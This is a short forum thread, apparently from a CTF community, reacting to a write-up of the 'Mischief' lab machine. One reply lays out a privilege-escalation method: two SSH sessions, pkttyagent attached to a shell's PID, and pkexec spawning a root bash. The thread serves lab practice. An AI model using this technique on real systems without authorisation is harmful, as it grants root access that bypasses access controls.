Mischief by 0xdf

0xdf · January 5, 2019, 3:23pm

A couple highlights:

r518 · January 5, 2019, 6:17pm

Thanks for this,

Didn’t know it could be done via systemd

fjv · January 5, 2019, 7:01pm

Thanks for the write up :3

Here’s another way for privesc.

Open 2 terminals and log in as loki via ssh in both of them:

In the first terminal, get bash’s PID : echo $$
Then in the second one, run a Polkit Agent for the first session: pkttyagent --process PID_OF_BASH
Finally, spawn a root shell using pkexec: pkexec --user root bash -i

bleubyte · January 5, 2019, 7:04pm

nice write up

0xdf · January 5, 2019, 8:22pm

woah, that’s awesome @fjv. i’m going to need to look into that more.

Topic		Replies	Views
Sunday write-up by epi Writeups wget , pfexec	4	765	September 29, 2018
[PWN] Kernel Adventures: Part 1 Challenges challenge , pwn	22	5107	August 29, 2023
Mischief write-up by epi Writeups writeup , writeups , mischief	2	650	January 26, 2019
Official Investigation Discussion Machines	58	4366	April 22, 2023
Official Codify Discussion Machines	86	7510	March 23, 2024